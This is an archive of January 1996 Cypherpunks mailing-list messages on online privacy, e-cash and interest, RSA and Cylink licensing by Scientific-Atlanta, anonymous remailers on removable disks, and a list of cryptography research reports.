					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 10 Jan 1996 12:47:47 +0800
To: "Alexander 'Sasha' Chislenko" <sasha1@netcom.com>
Subject: Re: PRIVACY: Private traces in public places
In-Reply-To: <2.2.32.19960110032650.006f1934@netcom.com>
Message-ID: <Pine.SV4.3.91.960109232922.15111B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Governments or whoever, can do all they want to make their collection of 
dossiers bulge even bigger than they are. But, these dossiers are only 
data sets. Data isn't quite the same os information. Information isn't 
quite the same as knowledge. Knowledge isn't quite the same as 
understanding. And understanding the situation has not been, 
historically, enough to ensure that government (or whoever) decision 
makers make the "right" decision.

Let the internal security apparatchiks spin the bottle all they want. 
They couldn't keep Rome from falling, nor the Byzantine Empire, nor the 
Ottoman Sultanate. They couldn't keep the Third Reich in place for a 
thousand years. They couldn't keep the Soviet Union glued together by 
force nor dirty persuasion nor extortionate non-economics.

The FBI can run, but it can't hide.

Alan Horowitz
alanh@infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Gibbons <steve@aztech.net>
Date: Wed, 10 Jan 1996 15:26:14 +0800
To: ecarp@netcom.com
Subject: Re: PRIVACY: Private traces in public places
Message-ID: <0099C274.0F297360.261@aztech.net>
MIME-Version: 1.0
Content-Type: text/plain


# > Governments or whoever, can do all they want to make their collection of 
# > dossiers bulge even bigger than they are. But, these dossiers are only 
# > data sets. Data isn't quite the same os information. Information isn't 
# > quite the same as knowledge. Knowledge isn't quite the same as 
# > understanding. And understanding the situation has not been, 
# > historically, enough to ensure that government (or whoever) decision 
# > makers make the "right" decision.
# > 
# > Let the internal security apparatchiks spin the bottle all they want. 
# > They couldn't keep Rome from falling, nor the Byzantine Empire, nor the 
# > Ottoman Sultanate. They couldn't keep the Third Reich in place for a 
# > thousand years. They couldn't keep the Soviet Union glued together by 
# > force nor dirty persuasion nor extortionate non-economics.

# The problem, as I see it, is that you can have too much information. 
# Information takes up room, takes up CPU cycles to process and store and
# retrieve, and the worst part is, it takes a human to evaluate it.  No
# computer in the world is going to be able to evaluate incoming humint for
# reliability.  That takes a human, and I suspect that it will be that way
# for quite some time.  The more information you gather, the worse the
# problem gets, until you have this massive database of information, all
# indexed and stuff, at your fingertips, but it's useless, because you can't
# tell whether it's real or BS or disinformation. 

It's how you classify things.  Raw data is raw data, and raw data is not the
same thing as information.  Until the disinformation gets filtered out, it can't
be classified as information, but falls into the raw-data category.

--
Steve@AZTech.Net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 10 Jan 1996 16:54:02 +0800
To: cypherpunks@toad.com
Subject: Re: PRIVACY: Private traces in public places
Message-ID: <ad189ef3050210041cf9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(Sasha, good to have you on our list!)

At 3:26 AM 1/10/96, Alexander 'Sasha' Chislenko wrote:

>  Sometimes, it comes as an unpleasant surprise to a person who
>looks for web pages referencing his own name, and finds, among
>other things, many of his explicit or controversial usenet or mailing
>list messages, old resumes that may contradict the current one,
>critical remarks of his high school girlfriend and former colleagues, etc.
>Knowing that this information is easily accessible to his new girlfriend
>and prospective employer may make him more than uncomfortable.

Remember a couple of years ago on the Extropians list when I claimed to
have compiled dossiers on people, from their admissions in posts about drug
use, infidelities, and other such things? Several of them got quite irate.


>All advice to such a person you may see on the Net mentions Net laws
>that should have been passed and personal actions that should or
>should not have been taken.

Not all such advice, because my advice has been different from this.


>How can people protect themselves from all this?
>
>Will people of the future all wear identical privacy suits, gloves and
>helmets and burn
>everything they have touched?
>
>Or they will just try not to do things they may later be ashamed of?
>(How do you know what you may be ashamed of 30 years from now?)

Or, the option I prefer: do what you gotta do, and screw those who claim
you should be ashamed of yourself.

Think of this as a screening process: anyone who is so offended or ashamed
for you (what a concept: "I'm ashamed for you") probably is not someone you
would want to deal with. Works for me.

I'm not trivializing the issue of search engines and archiving systems
turning up articles written, old posts, etc. Every couple of weeks,
sometimes more often, someone sends me a copy of one of my postings and
claims that someone else must be forging my name (recent posts on racial
issues, for example--while I'm not a racist, I despise quotas, setasides,
and preferential treatment for lazy people, of any race...this obviously
makes some people "ashamed for me" :-}).

These people, obsessed with political correctness, or having some notion
that consistency must be enforced, are the populist form of Thought Police.
Mostly I ignore these people pestering me to "explain" a post I made in a
group, and, if they persist, I add them to my filter file. I prefer this
liberated outlook to either of the two options you presented.

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Wed, 10 Jan 1996 22:44:57 +0800
To: Cypherpunks List <cypherpunks@toad.com>
Subject: E-cash and Interest
Message-ID: <Pine.OSF.3.91.960110002053.21014A-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



I had been doing some thinking about E-cash and some of the implications. 
It seems to me that there is another element in the discussion that has 
not gotten very much consideration.
When you have your money in the bank, you are earning interest on the 
money (albeit not very much! <g>) and that money continues to earn 
interest until it is withdrawn. If you write a check to pay for 
something, that ends your interest accumulation for that money. 
With the E-cash systems that I have seen, you generate your own E-cash 
and have it signed by a 'bank' At that moment, it becomes like cash in 
your wallet and you loose interest that this money could be earning.
Has this issue been addressed, or am I missing something?
Regards, 
Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 10 Jan 1996 15:10:10 +0800
To: cypherpunks@toad.com
Subject: Re: E-cash and Interest
Message-ID: <ad18a27506021004effb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:26 AM 1/10/96, Tim Philp wrote:
>I had been doing some thinking about E-cash and some of the implications.
>It seems to me that there is another element in the discussion that has
>not gotten very much consideration.
>When you have your money in the bank, you are earning interest on the
>money (albeit not very much! <g>) and that money continues to earn

What interest, if any, is a contractual arrangement a customer makes with a
bank. Some banks pay no interest at all, some pay low rates, some pay more.
A function of a lot of factors.

Before saying that digital cash will not pay interest, one would have to
know the type of digital cash and the ancillary contracts that may go with
it.

For example, the online clearing model could certainly still have
interest-bearing accounts, in the underlying currency or commodity that
represents the store of value to be paid out when the digital cash is
redeemed. It might be cumbersome, but it would certainly be possible for an
agent to buy what I'll call a "digital bond," worth one unit at time zero,
1.1 unit after one year, and so on.

>interest until it is withdrawn. If you write a check to pay for
>something, that ends your interest accumulation for that money.

Actually, writing the check does not end your accumulation of interest. The
payout of funds to the check casher is what ends the accumulation. Some
parallels with online clearing digital cash.


>With the E-cash systems that I have seen, you generate your own E-cash
>and have it signed by a 'bank' At that moment, it becomes like cash in
>your wallet and you loose interest that this money could be earning.
>Has this issue been addressed, or am I missing something?

Depends on the exact type. From your description, you're looking at the
model in which one closes out a bank account (presumably interest-bearing),
and says "Give it to me in unmarked bills" (loosely speaking). Well, if the
digital cash is really just a call on funds still held (and perhaps used,
hence they can give interest), then interest is still possible. If the bank
has given out funds to some other bank, then they can no longer pay
interest. (If this sounds confusing, it is because even in digital cash
systems one must think about where the store of value really is, who has
it, who must trade it for the numbers representing cash, etc. "There is no
digital coin" means more than just that there is no unforgeable thing that
is unforgeable the way a gold coin is; it also means that the numbers are
not actual value, that the value exists in other places...it gets murky,
though.)

In any case, most initial uses of digital cash will more closely resemble
currency exchanges (which it can be argued is a better model....), for
which the customer usually pays a fee, or there are buy/sell rates that
give the moneychangers in the temple their pound of flesh.

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 10 Jan 1996 09:13:44 +0800
To: cypherpunks@toad.com
Subject: Sci-Atlanta Uses RSA
Message-ID: <199601100050.BAA00333@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Scientific-Atlanta Announces Development of PowerKEY
Conditional Access System Using RSA 'Public Key'
Encryption Techniques

PowerKEY System Will Provide Sophisticated Security For
Signal Content, Interactive Messaging and Electronic
Commerce

S-A Becomes First Digital Set-Top Terminal Provider To
Use Patented RSA Algorithms


Atlanta, Jan. 9 -- Scientific-Atlanta, Inc. announced
today that it has licensed advanced encryption technology
from RSA Data Security, Inc. to be included in its
PowerKEY(TM) digital conditional access system, which is
being developed for use in set-top terminals, headend
components, cable modems and network element management
software.

The system will combine public key and secret key
cryptographic methods in physically secure
implementations to provide a high-performance security
solution for broadband networks.

Sophisticated conditional access systems allow cable and
other broadband network operators to be more flexible in
implementing new services that employ easy-to-use
security.  For example, both content providers and
network operators can have their own secure way to
protect content and communicate interactively with
subscribers.  Theft of services, falsified orders, and
vandalism of software and databases can be curtailed. 
Sensitive information, such as credit card numbers, can
be encrypted and exchanged.  In addition, the identity of
the sender and the message content can be authenticated
-- an important capability for multi-provider
authorization environments and for validation of orders
from subscribers.

The PowerKEY system, which is designed to be a licensable
access control and security system, will combine robust
security and encryption techniques with physically secure
implementation and sophisticated control systems.  The
PowerKEY system will be available on a variety of
interactive and broadcast networks, including CATV
broadcast, data, broadband multimedia, switched and
terrestrial wireless.  Its key functions will include:

-- message authentication to reject altered content and
   prevent downloading computer viruses to digital
   terminals

-- RSA's method of digital signature to provide
   unambiguous confirmation of sender's identity

-- public key encryption for secure transfer of
   entitlements, authorizations and consumer orders

-- high-speed secret key encryption to protect against
   theft of services

-- physically secure logic with renewable and replaceable
   security modules to thwart pirate tampering

-- seamless operation in support of both analog and
   digital services

-- multi-provider authenticated key management

-- forward and reverse path protection

-- messaging with guaranteed non-repudiation without need
   for trusted third parties

RSA's products are considered a de facto standard for
data encryption and authentication all over the world. 
The license to Scientific-Atlanta is the first that RSA
has granted to a set-top terminal manufacturer of its
widely adopted, patented technique for private messaging
and digital signature authentication.  The agreement
provides for the licensing of RSA technology, including
the algorithms that enable RSA's public key-private key
cryptography.  No other terms of the agreement were
disclosed.

With the PowerKEY system, Scientific-Atlanta plans to use
RSA cryptography algorithms in its end-to-end digital
systems -- set-top terminals, headend equipment and
control systems -- to improve communications security for
digital pay-per-view, cable modems and other broadcast
and interactive applications.  Scientific-Atlanta also
plans to license the PowerKEY system for use by other
manufacturers.

The widespread deployment of RSA encryption methods
supports the move to open standards of interactivity. 
"RSA's public key technology is one of the most advanced
forms of commercial cryptography available today," said
Michael P. Harney, Scientific-Atlanta's vice president
and general manager of broadband systems and technology. 
For the first time, this highly sophisticated encryption
technology will be bundled in a conditional access system
for both broadcast and interactive applications.  This
means carriers and MSOs will have a much better way to
manage conditional access issues."

The PowerKEY system's implementation of RSA algorithms
and Cylink Corporation's "Stanford patents" (licensing of
which was also announced today by Scientific-Atlanta) is
designed to be compatible with global open standards,
such as MPEG, DVB and DAVIC.

RSA developed and patented a method of exchanging
authenticated secret messages without exchanging secret
keys.  Most encryption systems rely on the sender of a
message or document to know the receiver's "secret key." 
The more parties a secret key is distributed to, the more
vulnerable it becomes to unauthorized use.  With RSA's
"public key" approach, a person's public key can be made
available to any interested party to send that person a
private message.  There is no need to privately exchange
secret keys.  For other parts of the electronic network
services application, such as digital video transmission,
the PowerKEY system will employ proven private key
algorithms that provide high-speed operation and
excellent signal security.

RSA Data Security is a leading cryptographic research and
development firm.  Its products focus on the secure
creation, transmission and storage of data, as well as
authenticating the author of data.  RSA provides software
developers with its BSAFE(TM) cryptography engine, which
includes multiple algorithms and modules for adding
encryption and authentication features to any
application. Scientific-Atlanta plans to use RSA's
engines for development of some elements of the PowerKEY
system.

Scientific-Atlanta is a leader in providing conditional
access systems for broadband and satellite communications
networks.  Its Vari-Axis(TM) analog descrambling systems
are deployed in millions of analog set-tops, and a
robust, secret-key digital conditional access system,
based on proven BMAC technology, is part of the
PowerVu(TM) system family of products.  The PowerKEY
system will expand Scientific-Atlanta's product line to
include the industry's first conditional access system to
utilize public key cryptography.

Scientific-Atlanta, Inc. (http://www.sciatl.com) is a
leading supplier of broadband communications systems,
satellite-based video, voice and data communications
networks and worldwide customer service and support.  The
company is the Official Broadband Video Distribution
Sponsor of the 1996 Olympic Games in Atlanta, Georgia.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 10 Jan 1996 09:14:08 +0800
To: cypherpunks@toad.com
Subject: Sci-Atlanta Uses Cylink
Message-ID: <199601100051.BAA00377@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Scientific-Atlanta Licenses Cylink's Security Techniques
for Digital Broadband Application

First Use of Patented Cylink Public Key Methods by a
Digital Set-Top Terminal Supplier for Two-Way Message
Encryption, Decryption and Authentication


Atlanta, Jan. 9 -- Scientific-Atlanta, Inc. announced
today the licensing from Cylink Corporation of
communications security techniques for use by cable and
other broadband television systems.

Cylink, a provider of enterprise-wide network information
security products and wireless communications, has
licensed to Scientific-Atlanta what are known as the
"Stanford patents," which cover the field of public key
cryptography, a security technique that ensures privacy,
authentication and integrity of electronic information.

The license gives Scientific-Atlanta the right to
practice public key cryptography methods, as defined in
certain intellectual property holdings of Cylink.  These
include methods for generation, authentication and
exchange of "public keys" used in securely communicating
point-to-point network messages.  Scientific-Atlanta
plans to use these cryptography techniques in its
development of a conditional access system for digital
networks -- including set-top terminals, headend
components, and network element management software -- to
improve communications security for digital pay-per-view,
cable modems and other broadcast and interactive
applications.

The license is the first that Cylink has granted to a
set-top terminal manufacturer of its patented
cryptographic techniques.  No other terms were disclosed.

With sophisticated encryption systems, cable and other
broadband network operators can be more flexible in
implementing new services that employ easy-to-use
security.  For example, both content providers and the
network operator can have a secure way of interactive
communications with subscribers.  Sensitive information,
such as credit card numbers, can be encrypted and
exchanged. The identity of the sender and the message
content can be authenticated -- an important capability
for multi-provider authorization environments and for
validation of orders from subscribers.

A public key-based cryptography system controls the
encryption and decryption of messages.  Each user is
assigned two unique mathematically-related keys: a
published public key, and a secret private key.  In a
cable TV environment, the public key for each
subscriber's set-top terminal can be distributed or
"published" while keeping the private key in secure
memory.

"We're excited about the opportunities this license opens
for content providers and network operators," said Bob
Van Orden, Scientific-Atlanta's product line director of
digital subscriber systems.  "With Cylink's innovations,
we have the foundation necessary for designing very
advanced security into any digital broadband application,
including pay-per-view, cable modems and electronic
shopping."

"Through the use of public key technologies, Scientific-
Atlanta will help network operators to protect the value
of their services," said David Morris, vice president of
marketing for Cylink.  "This is a vitally important step
for operators as they migrate to digital networks."

Scientific-Atlanta, Inc. (http://www.sciatl.com) is a
leading supplier of broadband communications systems,
satellite-based video, voice and data communications
networks and worldwide customer service and support.  The
company is the Official Broadband Video Distribution
Sponsor of the 1996 Olympic Games in Atlanta, Georgia.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 10 Jan 1996 19:12:35 +0800
To: Michael Handler <grendel@netaxs.com>
Subject: Re: Domains, InterNIC, and PGP (and physical locations of hosts, to boot)
Message-ID: <199601101100.DAA27160@ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:15 PM 1/6/96 -0500, Michael Handler <grendel@netaxs.com> wrote:

>ObGPS/cpunk/physical-location-of-machines: A recent IETF proposal would
>create a new DNS record that encoded the physical location of a
>machine, encoded in latitude and longitude. This would solve the
>problem MIT has had in distributing PGP, i.e. where exactly is
>unix5.netaxs.com? However, there's nothing to stop you from adding
>records that say your machines are at the latitude and longitude of,
>say, Fort Meade... ;-)

My laptop's latitude and longitude aren't constants....

And a DNS record identifying the precise location of
compuserve.com or netcom.com might not be very meaningful;
a more detailed record identifying the location of
port5.paloalto-annex-3.netcom.com might tell you which
terminal server to aim an ICBM at, but won't tell you where
I dialed in to it from.  But it still won't tell you if the
user is in Washington DC or Germany, though perhaps a DNS record
for Snow-Depth might be a bit more informative.

>    ftp://ds.internic.net/rfc/rfc1876.txt
>Again, I'm not too sure of the viability of this proposal. Not on
>effectiveness of proving true location -- it is more geared toward
>"visual 3-D packet tracing" -- but simply because I have _no_ fricking
>idea where our machines are (in terms of lat and long) to any degree
>of accuracy. 

There are several geography servers on the net, which can tell you
the lat/long for a city (more useful if your city is, say, 
Holmdel NJ than if it's Los Angeles.)  

Or you can buy one of those $12.95 CD-ROMs with all the street
addresses in the US on them (perhaps at the cost of adding a 
PC or Mac and CDROM drive to run the software...)
Feed it a street address, and you can get pretty close (mine
actually targets the other end of my block, but it's not
doing interpolations...)
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "The price of liberty is eternal vigilance" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Wed, 10 Jan 1996 21:43:11 +0800
To: jya@pipeline.com (John Young)
Subject: Re: PRIVACY: Private traces in public places
In-Reply-To: <199601101328.IAA01966@pipe4.nyc.pipeline.com>
Message-ID: <199601101336.HAA15355@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> These fine-minders, supported by the burgeoning private 
> investigative and security fields, will surely mine electronic 
> archives as thoroughly as they research paper -- and thanks to 
> wondrous Altavistas maybe more thoroughly.
> 
> And backed by these highly skilled lobbyists, laws will change 
> to make remunerative rain of -- and by -- archiving and search 
> technology as they have to capitalize on the technology of 
> doing the same in the worlds of printing, telegraph, telephone 
> and television.
> 
> Promotion of these privacy-invasive services on the Net 
> parallels the defensive measures explored on cypherpunks.

Agreed.  You don't even have to read the newsgroup or the web page - just 
search for "John Young" or "Ed Carp", and in a few seconds read 
everything your detractors have been saying about you anywhere on the 
net.  Then all it takes is one phone call to your lawyer.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Wed, 10 Jan 1996 22:00:23 +0800
To: usura@utopia.hacktic.nl
Subject: Re: SSH for Windows
In-Reply-To: <199601101153.MAA20011@utopia.hacktic.nl>
Message-ID: <199601101350.HAA16405@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> also on ftp.hacktic.nl/pub/replay/pub/incoming/ssh-1-2.zip

actually, it's ssh-1.2-.zip
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 10 Jan 1996 22:21:52 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Why Companies are Poor at Finding Bugs
In-Reply-To: <2.2.32.19960110024957.00963960@mail.teleport.com>
Message-ID: <9601101403.AA25208@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Alan Olsen writes:
 > >Until a crisis happens, then they are lambasted for not having
 > >spoken up more loudly and more forcefully.
 > 
 > I have seen this before in a number of companies...  

Anyone more interested in these sorts of organizational behavior
things should read Peter Senge's "The Fifth Discipline".




(Either that or "Dilbert".)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Wed, 10 Jan 1996 23:48:07 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: E-cash and Interest
In-Reply-To: <ad18a27506021004effb@[205.199.118.202]>
Message-ID: <Pine.OSF.3.91.960110080858.22386A-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



I think that you have hit the nail on the head. Money could still 'earn' 
interest until it is spent. The 'bank' still has the 'real' money. In 
fact, it is an improvement over cash, in that you could still earn 
interest on the money on your hard drive.
Thanks for the clarification.
Regards, 
Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 10 Jan 1996 21:36:00 +0800
To: cypherpunks@toad.com
Subject: Re: PRIVACY: Private traces in public places
Message-ID: <199601101328.IAA01966@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by nobody@REPLAY.COM (Anonymous) on Wed, 10 
Jan  1:43 PM

>   Last summer the first case in Britain of a libel on the 
Internet was
>   settled out of court when Laurence Godfrey accepted 
undisclosed
>   damages from another nuclear physicist, Philip 
Hallam-Baker, over
>   remarks made in 1993 on Usenet, an electronic conference 
with 16
>   million users. And Peter Lilley, the Social Security 
Secretary, sent a
>   stiff letter to the vice-chancellor of Leeds University 
after one of
>   its students used a faculty computer to make defamatory 
allegations
>   about him.

----------

The NYT reports that by 2000 there will be over 1 million 
lawyers in the US.


These fine-minders, supported by the burgeoning private 
investigative and security fields, will surely mine electronic 
archives as thoroughly as they research paper -- and thanks to 
wondrous Altavistas maybe more thoroughly.


And backed by these highly skilled lobbyists, laws will change 
to make remunerative rain of -- and by -- archiving and search 
technology as they have to capitalize on the technology of 
doing the same in the worlds of printing, telegraph, telephone 
and television.


Promotion of these privacy-invasive services on the Net 
parallels the defensive measures explored on cypherpunks.


Perhaps all c'punks should subscribe to cyberia-l and vice 
versa; they are hand in hand, or fist to fist, on this.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Wed, 10 Jan 1996 22:22:40 +0800
To: cypherpunks@toad.com
Subject: Re: Mixmaster On A $20 Floppy?
Message-ID: <199601101410.JAA29058@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 10, 1996 03:00:00, 'Bill Stewart <stewarts@ix.netcom.com>' wrote: 
 
 
>At 08:55 PM 1/5/96 -0500, tallpaul@pipeline.com (tallpaul) wrote: 
>>I've reports that the latest version of SyQuest's external parallel port 
>>EZ135 "floppy" drive is due on the shelves this month.  
> 
>Iomega's ZIP drives are similarly priced, hold 100 MB, and  
>come in parallel and SCSI flavors. 
> 
 
Quite right. In many ways the SyQuest and Iomega products are identical.
However, I'm shooting for the SyQuest because of the advertised 12.5 msec
access time. In any case, the tech is there and it is portable so we can
expect to see a variety of similar products in the future. 
 
 
>>Question 1: Can you fit linux, pgp, mixmaster, etc. on the 135 Mb disk
and 
>>have enough useful space left over for a useful amount of data?  
> 
>As various people have said, you can do it on a couple of floppies. 
>Is Mixmaster designed in a way that could easily accommodate having 
>Mixmasters pop in and out of existence, either well-known ones that
travel, 
>or (with some enhancement) temporaries that pop up and squawk their 
>existence to some sort of web site or mailing list?  What would it  
>take to add this capability? 
> 
 
I can't answer these questions which is why I started this thread to get
answers from those who have the knowledge required to make meaningful
answers. 
 
The major problem today stopping the proliferation of "temporary" sites
seems to be the user interface. Ultimately, we would want something that
was very easy to use and had incredibly simple user manuals (like the
Army's Training Manuals for really dumb soldiers). You know, the ones that
start: "This is a bullet. It has a pointy end and a flat end. The pointy
end is the end you want to face the enemy. The flat end is the end you want
to face you." 
 
>>Question 3: Anyone want to speculate on what data recovery is like when 
>>encrypted data and the horse it rode in (and out) on has all been 
>>physically destroyed at a replacement cost of only $US20?  
> 
>Old 5 1/4" floppies make a very secure satisfying sound when you  
>take the magnetic material out and drop it into a shredder :-) 
>The 20 MB Bernoulli Box floppies were also shreddable. 
> 
 
Yeah, and imagine the noise an anti-privacy technician makes when he/she/it
is told to try to extract plaintext from the shredded results. 
 
 
 
>#-- 
>#				Thanks;  Bill 
># Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281 
># 
># "The price of liberty is eternal vigilance" used to mean us watching 
># the government, not the other way around.... 
> 
> 
-- 
     -- tallpaul 
     -- Any political analysis that fits on a bumper sticker is wrong. 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 10 Jan 1996 22:35:33 +0800
To: cypherpunks@toad.com
Subject: TAL_kup
Message-ID: <199601101426.JAA16123@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   1-10-96. NYPaper:

   "Group Urges an Internet Ban On Hate Groups' Messages.
   Joins in Move to Censor Offensive Material."

      Citing the "rapidly expanding presence of organized hate
      groups on the Internet," a leading Jewish human rights
      group yesterday began sending letters to hundreds of
      Internet access providers and universities asking them
      to refuse to carry messages that "promote racism, anti-
      Semitism, mayhem and violence."

      A sage says, "It is not possible to end idiocy by
      censoring it. The best response is cellular."

   TAL_kup












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Wed, 10 Jan 1996 22:51:45 +0800
To: cypherpunks@toad.com
Subject: Reports available via CTRS
Message-ID: <199601101438.JAA03611@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


[Abstracts for, and (in most cases) links to these report titles can be found 
at the CTRS site, http://www.itribe.net/CTRS/ ]

1.Tuomas Aura, Modelling the Needham-Schroeder authentication protocol with high
     level Petri nets, Technical Report B14, Espoo, Finland, September 1995. 

2.Arnold G. Reinhold, Diceware for Passphrase Generation and Other Cryptographic
     Applications, Cambridge, MA, July 28, 1995. 

3.Arnold G. Reinhold, A Diceware Word List, Cambridge, MA, July 28, 1995. 

4.Arnold G. Reinhold, Results of a Survey on PGP Pass Phrase Usage, Cambridge, MA, July
     28, 1995. 

5.Arnold G. Reinhold, "Common Sense and Cryptography" , Internet Secrets, John Levine
     and Carol Baroudi (Ed.), Foster City, CA, 1995, pp. 115-150. 

6.Arnold G. Reinhold, On the Function of MHC-Antigen Specificity, Cambridge, MA,
     March 3, 1989. 

7.VeriSign, Inc., FAQ: Answers About Today's Digital IDs, July 15, 1995. 

8.Roos, Andrew, A Class of Weak Keys in the RC4 Stream Cipher (Preliminary Draft),
     Westville, South Africa, September 1995. 

9.Terry Ritter, Substitution Cipher with Pseudo-Random Shuffling: The Dynamic
     Substitution Combiner., Cryptologia, vol. 14, no. 4, 1990, pp. 289-303. 

10.Terry Ritter, Transposition Cipher with Pseudo-Random Shuffling: The Dynamic
     Transposition Combiner., Cryptologia, vol. 15, no. 1, 1991, pp. 1-17. 

11.Terry Ritter, The Efficient Generation of Cryptographic Confusion Sequences.,
     Cryptologia, vol. 15, no. 2, 1991, pp. 81-139. 

12.Terry Ritter, Voice and Video Cryptography in a DSP Environment., Proceedings of the
     Second Annual Texas Instruments TMS320 Educators Conference, Houston, Texas, August
     5-7, 1992. 

13.Terry Ritter, Estimating Population from Repetitions in Accumulated Random
     Samples., Cryptologia, vol. 18, no. 2, 1994, pp. 155-190. 

14.Camenisch, Jan; Piveteau, Jean-Marc; Stadler, Markus, An Efficient Fair Payment System,
     India, Mai 1996. 

15.Camenisch, Jan; Piveteau, Jean-Marc; Stadler, Markus, An Efficient Electronic Payment
     System Protecting Privacy, Lecture Notes in Computer Science, vol. 875, pp. 207-215,
     Berlin, November 1994. 

16.Camenisch, Jan; Piveteau, Jean-Marc; Stadler, Markus, Blind Signatures Based on the
     Discrete Logarithm Problem, Proceedings of EUROCRYPT 94,Lecture Notes in Computer
     Science, vol. 9505, pp. 428-432, Berlin, May 1994. 

